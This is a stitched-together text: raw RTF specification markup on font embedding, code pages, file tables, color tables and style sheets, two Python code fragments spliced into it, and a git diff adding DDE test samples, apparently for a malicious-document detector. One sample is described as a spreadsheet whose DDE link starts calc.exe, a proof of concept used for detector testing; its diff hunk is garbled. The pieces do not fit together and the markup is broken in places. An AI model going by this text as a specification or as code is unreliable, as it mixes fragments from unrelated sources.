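    163: 1258,   # Vietnamese
    177: 1255,   # Hebrew
    178: 1256,   # Arabic
    186: 1257,   # Baltic
    204: 1251,   # Russian (Cyrillic)
    222: 874,    # Thai
    238: 1250,   # Eastern European
    254: 437,    # PC 437
}

def codepage_for_charset(n: int, default: int = 1252) -> int:
    """Best-effort code page for a \\fcharsetN value, falling back to cp1252."""
    return FCHARSET_TO_CODEPAGE.get(n, default)
```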
\par If }{\b \\fprq}{ is specified, the }{\b\i N}{ argument can be one of the following values.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\keepn\widctlpar\intbl\adjustright {\b Pitch\cell Value\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\keepn\widctlpar\intbl\adjustright {Default pitch\cell 0\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {Fixed pitch\cell 1\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {Variable pitch\cell 2
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Toc313960803}{\*\bkmkstart _Toc335399077}{\*\bkmkstart _Toc380819777}{\*\bkmkstart Font_Embedding}
{\*\bkmkstart _Ref281718077}Font Embedding{\*\bkmkend _Toc313960803}{\*\bkmkend _Toc335399077}{\*\bkmkend _Toc380819777}{\*\bkmkend Font_Embedding}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {RTF supports embedded fonts with the }{\b \\fontemb}{
group located inside a font definition. An embedded font can be specified by a file name, or the actual font data may be located inside the group. If a file name is specified, it is contained in the }{\b \\fontfile}{ group. The }{\b \\cpg}{
control word can be used to specify the character set for the file name.
\par RTF supports TrueType}{\field\fldedit\fldlock{\*\fldinst {\fs12 symbol 210 \\f "Symbol" \\s 6}}{\fldrslt {\f3\fs12 \u210\'d2}}}{ and other embedded fonts. The type of the embedded font is described by the following control words.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Embedded font type\cell }\pard
\widctlpar\intbl\adjustright {\b \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\ftnil\cell }{Unknown or default font type (the default)\cell }\pard
\widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\fttruetype\cell }{TrueType font\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard\plain \s4\sb240\sa240\keepn\widctlpar\outlinelevel3\adjustright \b\i\f1\cgrid {{\*\bkmkstart _Ref284384822}{\*\bkmkstart _Toc313960804}{\*\bkmkstart _Toc335399078}{\*\bkmkstart _Toc380819778}{\*\bkmkstart CodePage_Support}Code Page Support
{\*\bkmkend _Ref281718077}{\*\bkmkend _Ref284384822}{\*\bkmkend _Toc313960804}{\*\bkmkend _Toc335399078}{\*\bkmkend _Toc380819778}{\*\bkmkend CodePage_Support}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {A font may have a different character set from the character set of the document. For example, the Symbol font has the same
characters in the same positions both on the Macintosh and in Windows. RTF describes this with the }{\b \\cpg}{
control word, which names the character set used by the font. In addition, file names (used in field instructions and in embedded fonts) may not necessarily be the same as the character set of the document; the }{\b \\cpg}{
control word can change the character set for these file names as well. However, all RTF documents must still declare a character set (that is, }{\b \\ansi}{,}{\b \\mac}{,}{\b \\pc}{, or }{\b \\pca}{) to maintain backward
compatibility with earlier RTF readers.
\par }\pard \sa120\keepn\widctlpar\adjustright {The following table describes valid values for }{\b \\cpg}{.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\nowidctlpar\intbl\adjustright {\b Value\cell Description\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\nowidctlpar\intbl\adjustright {437\cell United States IBM\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {
\lang3082 708\cell Arabic (ASMO 708)\cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard \sa120\nowidctlpar\intbl\adjustright {\lang3082 709\cell Arabic (ASMO 449+, BCON V4)\cell }\pard \widctlpar\intbl\adjustright {\lang3082 \row }\pard
\sa120\nowidctlpar\intbl\adjustright {710\cell Arabic (transparent Arabic)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {711\cell Arabic (Nafitha Enhanced)\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\nowidctlpar\intbl\adjustright {720\cell Arabic (transparent ASMO)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {819\cell Windows 3.1 (United States and Western Europe)\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {850\cell IBM multilingual\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {852\cell Eastern European\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {860\cell Portuguese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {862\cell Hebrew\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\nowidctlpar\intbl\adjustright {863\cell French Canadian\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {864\cell Arabic\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\nowidctlpar\intbl\adjustright {865\cell Norwegian\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {866\cell Soviet Union\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\nowidctlpar\intbl\adjustright {874\cell Thai\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {932\cell Japanese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {
936\cell Simplified Chinese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {949\cell Korean\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {950\cell
Traditional Chinese\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1250\cell Windows 3.1 (Eastern European)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1251\cell
Windows 3.1 (Cyrillic)\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1252\cell Western European\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1253\cell Greek\cell
}\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1254\cell Turkish\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1255\cell Hebrew\cell }\pard \widctlpar\intbl\adjustright
{\row }\pard \sa120\nowidctlpar\intbl\adjustright {1256\cell Arabic\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\nowidctlpar\intbl\adjustright {1257\cell Baltic\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\nowidctlpar\intbl\adjustright {1258\cell Vietnamese\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\nowidctlpar\intbl\adjustright {1361\cell Johab
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {\lang1036 {\*\bkmkstart _Ref281718621}{\*\bkmkstart _Toc313960805}{\*\bkmkstart _Toc335399079}
{\*\bkmkstart _Toc380819779}{\*\bkmkstart _Toc381591826}{\*\bkmkstart _Toc382644187}{\*\bkmkstart _Toc383176018}{\*\bkmkstart _Toc386002176}{\*\bkmkstart _Toc386539807}{\*\bkmkstart File_Table}{\*\bkmkstart _Toc519492442}{\*\bkmkstart _Toc521909686}
File Table}{{\*\bkmkend _Ref281718621}{\*\bkmkend _Toc313960805}{\*\bkmkend _Toc335399079}{\*\bkmkend _Toc380819779}{\*\bkmkend _Toc381591826}{\*\bkmkend _Toc382644187}{\*\bkmkend _Toc383176018}{\*\bkmkend _Toc386002176}{\*\bkmkend _Toc386539807}
{\*\bkmkend File_Table}{\*\bkmkend _Toc519492442}{\*\bkmkend _Toc521909686}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\filetbl}{
control word introduces the file table destination. The only time a file table is created in RTF is when the document contains subdocuments. The file table group defines the files referenced in the document and has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<filetbl>\cell '\{\\*' }{\b \\filetbl }{('\{' <fileinfo> '\}')+ '\}'\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd
\trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<fileinfo>\cell \\}{\b file}{ <filenum><relative>?<osnum>?<source>+ <file name>\cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\intbl\adjustright {<filenum>\cell }{\b\i \\fid }{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<relative>\cell }{\b \\}{\b\i frelative}{ \cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\intbl\adjustright {<osnum>\cell \\}{\b\i fosnum}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {<source>\cell }{\b \\fvalidmac}{ | }{\b \\fvaliddos}{ | }{\b \\fvalidntfs}{ | }{\b \\
fvalidhpfs}{ | }{\b \\fnetwork | \\fnonfilesys}{\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<file name>\cell }\pard\plain
\s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {#PCDATA\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard \sa120\widctlpar\adjustright {
\par Note that the file name can be any valid alphanumeric string for the named file system, indicating the complete path and file name.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\filetbl\cell }{A list of documents referenced by the current document. The file table
has a structure analogous to the style or font table. This is a destination control word output as part of the document header. \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\file\cell }{
Marks the beginning of a file group, which lists relevant information about the referenced file. This is a destination control word.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fid}{\b\i N}{\b \cell }{
File ID number. Files are referenced later in the document using this number.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\frelative}{\b\i N}{\b \cell }{
The character position within the path (starting at 0) where the referenced file's path starts to be relative to the path of the owning document. For example, if a document is saved to the path C:\\Private\\Resume\\
File1.doc and its file table contains the path C:\\Private\\Resume\\Edu\\File2.doc, then that entry in the file table will be }{\b \\frelative}{18, to point at the character "E" in "Edu". This allows preservation of relative paths.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fosnum}{\b\i N}{\b \cell }{Currently only filled in for paths from the Macintosh file system. It is an operating system\endash
specific number for identifying the file, which may be used to speed up access to the file or find the file if it has been moved to another folder or disk. The Macintosh operating system name for this number is the "file id." Additional meanings of the }{
\b \\fosnum}{\b\i N }{control word may be defined for other file systems in the future.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fvalidmac\cell }{Macintosh file system.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fvaliddos\cell }{MS-DOS file system.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fvalidntfs\cell }{NTFS file system.
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\keepn\widctlpar\intbl\adjustright {\b \\fvalidhpfs\cell }\pard \sa120\widctlpar\intbl\adjustright {HPFS file system.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {\b \\fnetwork\cell }{Network file system. This control word may be used in conjunction with any of the previous file source control words.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep
\clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\fnonfilesys\cell }{Indicates http/odma.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain
\s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Ref281717028}{\*\bkmkstart _Toc313960806}{\*\bkmkstart _Toc335399080}{\*\bkmkstart _Toc380819780}{\*\bkmkstart _Toc381591827}{\*\bkmkstart _Toc382644188}
{\*\bkmkstart _Toc383176019}{\*\bkmkstart _Toc386002177}{\*\bkmkstart _Toc386539808}{\*\bkmkstart Color_Table}{\*\bkmkstart _Toc519492443}{\*\bkmkstart _Toc521909687}Color Table{\*\bkmkend _Ref281717028}{\*\bkmkend _Toc313960806}{\*\bkmkend _Toc335399080}
{\*\bkmkend _Toc380819780}{\*\bkmkend _Toc381591827}{\*\bkmkend _Toc382644188}{\*\bkmkend _Toc383176019}{\*\bkmkend _Toc386002177}{\*\bkmkend _Toc386539808}{\*\bkmkend Color_Table}{\*\bkmkend _Toc519492443}{\*\bkmkend _Toc521909687}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\colortbl}{ control word introduces the color table group, which defines screen colors, character colors, and other color information. The color table group has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<colortbl>\cell }{\lang1040 '\{' }{\b\lang1040 \\colortbl}{\lang1040 <colordef>+ '\}'\cell }\pard
\widctlpar\intbl\adjustright {\lang1040 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<colordef>\cell }{\b\i \\red}{ ? & }{\b\i \\green}{ ? &}{\b\i \\blue}{ ? ';'
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\adjustright {
\par The following are valid control words for this group.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\red}{\b\i N}{\b \cell }{Red index\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {\b \\green}{\b\i N}{\b \cell }{Green index\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {
\b \\blue}{\b\i N}{\b \cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {Blue index\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard \sa120\widctlpar\adjustright {
\par Each definition must be delimited by a semicolon, even if the definition is omitted. If a color definition
is omitted, the RTF reader uses its default color. The following example defines the default color table used by Word. The first color is omitted, as shown by the semicolon following the}{\b \\colortbl }{
control word. The missing definition indicates that color 0 is the \ldblquote auto\rdblquote  color.
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\colortbl;\\red0\\green0\\blue0;\\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\green255\\blue0;\\
red255\\green255\\blue255;\\red0\\green0\\blue128;\\red0\\green128\\blue128;\\red0\\green128\\blue0;\\red128\\green0\\blue128;\\red128\\green0\\blue0;\\red128\\green128\\blue0;\\red128\\green128\\blue128;\\red192\\green192\\blue192;\}
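A color table like the default one shown above is simple to parse mechanically. The following Python sketch (the regex and function name are my own assumptions, not anything from the specification) turns the contents of a \\colortbl group into RGB tuples, using None for an omitted definition (the "auto" color):

```python
import re

def parse_colortbl(group):
    """Parse the contents of an RTF \\colortbl group into a list of
    (red, green, blue) tuples; an empty definition (just ';') becomes
    None, meaning the reader should use its default 'auto' color."""
    colors = []
    for definition in group.rstrip(";").split(";"):
        if not definition.strip():
            colors.append(None)  # omitted definition -> auto color
            continue
        values = dict(re.findall(r"\\(red|green|blue)(\d+)", definition))
        colors.append((int(values.get("red", 0)),
                       int(values.get("green", 0)),
                       int(values.get("blue", 0))))
    return colors

table = parse_colortbl(r";\red0\green0\blue0;\red0\green0\blue255;")
assert table[0] is None          # color 0 is the auto color
assert table[1] == (0, 0, 0)     # black
assert table[2] == (0, 0, 255)   # blue
```

A \cf2 or \cb2 run in the document body would then index entry 2 of this list.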
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The foreground and background colors use indexes into the color table to define a color. For more information on color setup, see your Windows documentation.
\par The following example defines a block of text in color (where supported). Note that the }{\b \\cf}{/}{\b \\cb}{ index is the index of an entry in the color table, which represents a red/green/blue color combination.
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\f1\\cb1\\cf2 This is colored text. The background is color\line 1 and the foreground is color 2.\}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {If the file is translated for software that does not display color, the reader ignores the color table group.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Style_Sheet}{\*\bkmkstart _Ref281714441}{\*\bkmkstart _Ref281719807}{\*\bkmkstart _Toc313960807}{\*\bkmkstart _Toc335399081}{\*\bkmkstart _Toc380819781
}{\*\bkmkstart _Toc381591828}{\*\bkmkstart _Toc382644189}{\*\bkmkstart _Toc383176020}{\*\bkmkstart _Toc386002178}{\*\bkmkstart _Toc386539809}{\*\bkmkstart StyleSheet}{\*\bkmkstart _Toc519492444}{\*\bkmkstart _Toc521909688}{\*\bkmkend _Style_Sheet}
Style Sheet{\*\bkmkend _Ref281714441}{\*\bkmkend _Ref281719807}{\*\bkmkend _Toc313960807}{\*\bkmkend _Toc335399081}{\*\bkmkend _Toc380819781}{\*\bkmkend _Toc381591828}{\*\bkmkend _Toc382644189}{\*\bkmkend _Toc383176020}{\*\bkmkend _Toc386002178}
{\*\bkmkend _Toc386539809}{\*\bkmkend StyleSheet}{\*\bkmkend _Toc519492444}{\*\bkmkend _Toc521909688}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\stylesheet}{ control word introduces the style sheet group, which contains definitions and descriptions of the various styles used in the document. All styles in the document's style sheet can be included, even if not all the styles are used. In RTF, a style is a form of shorthand used to specify a set of character, paragraph, or section formatting.
\par The style sheet group has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {<stylesheet>\cell '\{' }{\b \\stylesheet }{<style>+ '\}'\cell }\pard \widctlpar\intbl\adjustright {\row
+ [diff hunk garbled in extraction: the added lines were an Excel 2003 SpreadsheetML test file whose XML markup was stripped. The recoverable cell contents are the comment "This spread sheet has a dde link which starts calc.exe", a DDE result cell showing "#REF!", numeric cells 3, 1 and 2, and several "False" worksheet-option flags.]
diff --git a/tests/test-data/msodde/dde-in-word2003.xml.zip b/tests/test-data/msodde/dde-in-word2003.xml.zip
new file mode 100644
index 00000000..1ef53733
Binary files /dev/null and b/tests/test-data/msodde/dde-in-word2003.xml.zip differ
diff --git a/tests/test-data/msodde/dde-in-word2007.xml.zip b/tests/test-data/msodde/dde-in-word2007.xml.zip
new file mode 100644
index 00000000..97b500d1
Binary files /dev/null and b/tests/test-data/msodde/dde-in-word2007.xml.zip differ
diff --git a/tests/test-data/msodde/dde-test-from-office2003.doc.zip b/tests/test-data/msodde/dde-test-from-office2003.doc.zip
new file mode 100644
index 00000000..77a84c02
Binary files /dev/null and b/tests/test-data/msodde/dde-test-from-office2003.doc.zip differ
diff --git a/tests/test-data/msodde/dde-test-from-office2013-utf_16le-korean.doc.zip b/tests/test-data/msodde/dde-test-from-office2013-utf_16le-korean.doc.zip
new file mode 100644
index 00000000..b0a6aae4
Binary files /dev/null and b/tests/test-data/msodde/dde-test-from-office2013-utf_16le-korean.doc.zip differ
diff --git a/tests/test-data/msodde/dde-test-from-office2016.doc.zip b/tests/test-data/msodde/dde-test-from-office2016.doc.zip
new file mode 100644
index 00000000..4d72e9bb
Binary files /dev/null and b/tests/test-data/msodde/dde-test-from-office2016.doc.zip differ
diff --git a/tests/test-data/msodde/dde-test.docm b/tests/test-data/msodde/dde-test.docm
new file mode 100644
index 00000000..ee5362a8
Binary files /dev/null and b/tests/test-data/msodde/dde-test.docm differ
diff --git a/tests/test-data/msodde/dde-test.docx b/tests/test-data/msodde/dde-test.docx
new file mode 100644
index 00000000..5fba6b29
Binary files /dev/null and b/tests/test-data/msodde/dde-test.docx differ
diff --git a/tests/test-data/msodde/dde-test.xlsb b/tests/test-data/msodde/dde-test.xlsb
new file mode 100644
index 00000000..0e8fd7e4
Binary files /dev/null and b/tests/test-data/msodde/dde-test.xlsb differ
diff --git a/tests/test-data/msodde/dde-test.xlsm b/tests/test-data/msodde/dde-test.xlsm
new file mode 100644
index 00000000..0740182f
Binary files /dev/null and b/tests/test-data/msodde/dde-test.xlsm differ
diff --git a/tests/test-data/msodde/dde-test.xlsx b/tests/test-data/msodde/dde-test.xlsx
new file mode 100644
index 00000000..33c828df
Binary files /dev/null and b/tests/test-data/msodde/dde-test.xlsx differ
diff --git a/tests/test-data/msodde/harmless-clean-2003.xml b/tests/test-data/msodde/harmless-clean-2003.xml
new file mode 100644
index 00000000..477069f7
--- /dev/null
+++ b/tests/test-data/msodde/harmless-clean-2003.xml
@@ -0,0 +1,3 @@
+ [three added lines of Word 2003 XML; the markup was stripped in extraction. The surviving text is the document-property values "user user 2 0 2017-10-26T09:10:00Z 2017-10-26T09:10:00Z 1 39 250 2 1 288 16".]